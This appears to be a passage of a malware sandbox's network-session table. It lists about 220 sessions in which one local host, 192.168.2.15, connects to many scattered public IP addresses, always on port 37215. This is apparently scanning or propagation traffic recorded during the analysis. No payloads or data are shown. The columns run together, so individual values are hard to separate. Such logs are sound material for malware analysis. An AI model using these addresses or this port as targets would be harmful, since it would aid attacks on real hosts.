                                              11187192.168.2.1559956222.112.254.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11188192.168.2.1548246197.154.148.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11189192.168.2.1536820186.229.32.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11190192.168.2.1534926190.186.96.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11191192.168.2.154005441.147.127.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11192192.168.2.1544334121.213.212.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11193192.168.2.1547144190.84.255.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11194192.168.2.155965645.59.35.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11195192.168.2.1539386222.236.54.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11196192.168.2.153525241.34.24.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11197192.168.2.1550020186.56.215.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11198192.168.2.1552984222.159.92.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11199192.168.2.1556642122.237.14.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11200192.168.2.155851231.122.33.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11201192.168.2.1540628122.110.121.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11202192.168.2.1556776181.203.19.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11203192.168.2.1549210122.97.206.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11204192.168.2.1548952181.11.53.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11205192.168.2.1554180219.196.17.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11206192.168.2.1533236121.93.194.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11207192.168.2.155179037.94.141.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11208192.168.2.155387637.169.66.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11209192.168.2.1534478197.202.156.437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11210192.168.2.1560866157.235.244.2137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11211192.168.2.1560348186.191.65.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11212192.168.2.1558536156.163.147.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11213192.168.2.1543456186.146.58.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11214192.168.2.153991031.93.22.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11215192.168.2.155966845.13.101.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11216192.168.2.1545980197.47.15.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11217192.168.2.154270441.246.10.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11218192.168.2.1542508197.122.192.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11219192.168.2.1548562122.25.130.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11220192.168.2.1533962121.223.220.11737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11221192.168.2.1559144121.190.182.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11222192.168.2.1550094186.197.64.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11223192.168.2.156067045.24.90.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11224192.168.2.155081637.58.226.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11225192.168.2.1543128222.85.20.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11226192.168.2.1542220156.153.219.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11227192.168.2.1542838138.57.63.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11228192.168.2.1546750186.168.176.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11229192.168.2.1538550186.42.178.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11230192.168.2.1560760138.219.173.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11231192.168.2.1542790186.115.147.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11232192.168.2.1546348102.66.99.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11233192.168.2.1538504190.53.28.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11234192.168.2.1534326222.104.33.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11235192.168.2.155485845.97.224.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11236192.168.2.155416245.17.129.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11237192.168.2.1534694121.171.91.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11238192.168.2.1560576181.64.239.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11239192.168.2.156084037.86.151.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11240192.168.2.1552296121.155.104.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11241192.168.2.154412437.74.86.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11242192.168.2.1544942190.240.72.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11243192.168.2.1553190190.180.65.11037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11244192.168.2.1547560138.21.146.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11245192.168.2.1533024156.238.211.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11246192.168.2.1534568102.223.97.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11247192.168.2.1547238186.210.25.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11248192.168.2.1545074138.135.115.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11249192.168.2.1541882121.136.209.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11250192.168.2.1551810222.95.48.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11251192.168.2.15550888.88.18.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11252192.168.2.1540276222.9.94.18937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11253192.168.2.1560276138.219.82.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11254192.168.2.154214094.230.12.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11255192.168.2.1543392186.122.205.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11256192.168.2.154845237.7.193.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11257192.168.2.1537796156.156.9.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11258192.168.2.1553984181.221.59.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11259192.168.2.1558302222.103.25.16637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11260192.168.2.1534120157.128.125.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11261192.168.2.154135094.132.199.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11262192.168.2.1556772157.109.249.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11263192.168.2.153460484.192.173.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11264192.168.2.1549344121.86.154.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11265192.168.2.1549472121.218.165.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11266192.168.2.1545748181.77.199.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11267192.168.2.154590694.155.70.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11268192.168.2.1558552157.150.70.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11269192.168.2.1534000156.244.97.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11270192.168.2.1556464102.241.165.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11271192.168.2.1546130157.169.73.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11272192.168.2.1533500197.80.251.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11273192.168.2.153818241.109.201.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11274192.168.2.1540840102.243.18.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11275192.168.2.154409694.208.28.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11276192.168.2.1533642102.45.214.14537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11277192.168.2.154354879.218.242.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11278192.168.2.1556392121.216.152.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11279192.168.2.1547920121.109.213.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11280192.168.2.154082445.104.23.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11281192.168.2.155289694.99.27.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11282192.168.2.153752645.221.247.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11283192.168.2.1560576181.192.193.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11284192.168.2.155441245.31.23.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11285192.168.2.1547174181.235.81.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11286192.168.2.154868245.80.211.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11287192.168.2.1533392121.171.183.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11288192.168.2.1548764122.104.121.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11289192.168.2.1545968190.51.38.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11290192.168.2.1553306181.130.114.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11291192.168.2.1536188181.4.79.2937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11292192.168.2.1539358197.235.92.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11293192.168.2.1550456190.202.29.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11294192.168.2.1535848186.237.87.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11295192.168.2.155095694.73.17.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11296192.168.2.1555598122.7.206.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11297192.168.2.1542270102.206.251.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11298192.168.2.1543394156.212.169.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11299192.168.2.154916831.168.121.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11300192.168.2.1560306156.103.23.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11301192.168.2.1545118190.31.237.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11302192.168.2.1558582102.144.8.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11303192.168.2.155286631.99.21.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11304192.168.2.1548794197.142.200.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11305192.168.2.1542404156.131.64.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11306192.168.2.1557426222.132.197.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11307192.168.2.155688231.99.63.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11308192.168.2.153963045.73.159.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11309192.168.2.155083637.249.250.5437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11310192.168.2.155215445.159.177.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11311192.168.2.1543074197.50.76.16937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11312192.168.2.154395841.245.102.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11313192.168.2.1551156222.37.39.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11314192.168.2.154165431.229.167.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11315192.168.2.1547192157.131.101.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11316192.168.2.1552416197.201.118.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11317192.168.2.155531841.53.19.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11318192.168.2.1539218121.8.105.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11319192.168.2.155288094.150.175.11937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11320192.168.2.15570261.205.119.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11321192.168.2.1538568186.214.149.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11322192.168.2.1541416181.211.117.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11323192.168.2.1560984157.241.79.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11324192.168.2.1536316156.16.255.18037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11325192.168.2.1534808157.161.98.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11326192.168.2.1538542122.132.99.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11327192.168.2.1558990157.224.176.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11328192.168.2.1537882156.57.185.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11329192.168.2.1533028222.66.148.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11330192.168.2.1539012222.209.173.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11331192.168.2.154408447.4.248.13137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11332192.168.2.154036845.237.134.337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11333192.168.2.154484494.252.178.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11334192.168.2.154542631.210.241.8237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11335192.168.2.1551824222.196.177.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11336192.168.2.154161041.57.54.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11337192.168.2.153862441.101.27.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11338192.168.2.1553426102.68.176.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11339192.168.2.1554306122.213.197.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11340192.168.2.1550532102.249.229.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11341192.168.2.1550130157.9.84.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11342192.168.2.1538738156.136.43.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11343192.168.2.1552896121.64.11.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11344192.168.2.1557738156.71.151.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11345192.168.2.154645694.90.114.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11346192.168.2.1538976184.245.53.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11347192.168.2.1547174190.221.192.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11348192.168.2.1553386122.106.151.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11349192.168.2.1544844122.221.154.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11350192.168.2.1538372121.144.16.18337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11351192.168.2.155055640.99.4.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11352192.168.2.155534037.63.94.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11353192.168.2.1559482156.231.141.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11354192.168.2.153527237.112.207.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11355192.168.2.1546358222.250.2.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11356192.168.2.1545362157.70.36.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11357192.168.2.1550568197.253.224.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11358192.168.2.1559912222.77.174.1137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11359192.168.2.1555308197.77.169.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11360192.168.2.1537478122.169.185.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11361192.168.2.1560540181.173.209.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11362192.168.2.154770494.241.42.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11363192.168.2.1542882122.203.75.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11364192.168.2.153834837.124.222.3737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11365192.168.2.1557030186.44.194.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11366192.168.2.1546388157.172.250.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11367192.168.2.154690231.136.231.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11368192.168.2.1547368121.144.87.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11369192.168.2.1549264190.34.158.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11370192.168.2.154116045.130.81.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11371192.168.2.1539402186.209.252.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11372192.168.2.1545958186.234.205.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11373192.168.2.155028494.124.3.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11374192.168.2.1545038157.5.85.7937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11375192.168.2.153458241.46.86.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11376192.168.2.1555604222.40.132.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11377192.168.2.1538654197.193.8.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11378192.168.2.1532994186.8.43.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11379192.168.2.155745231.179.227.8137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11380192.168.2.1549628138.221.108.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11381192.168.2.1540122102.44.16.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11382192.168.2.1543728102.3.52.20337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11383192.168.2.1553250138.33.131.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11384192.168.2.1555010122.174.158.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11385192.168.2.1534416181.146.37.12737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11386192.168.2.153909637.77.86.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11387192.168.2.1552450138.29.232.15237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11388192.168.2.155905487.178.101.21937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11389192.168.2.1544616157.255.202.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11390192.168.2.153366645.119.183.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11391192.168.2.154609241.51.220.15937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11392192.168.2.154826494.49.177.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11393192.168.2.153395037.40.35.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11394192.168.2.1559204190.33.164.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11395192.168.2.1538330138.65.180.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11396192.168.2.1548384186.113.212.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11397192.168.2.153960045.165.98.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11398192.168.2.1558322190.40.128.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11399192.168.2.155589231.231.125.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11400192.168.2.155594657.242.163.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11401192.168.2.1541408197.71.206.20937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11402192.168.2.154083241.10.210.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11403192.168.2.1552598197.238.179.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11404192.168.2.1558878122.46.141.14137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              11405192.168.2.1545966222.59.134.337215
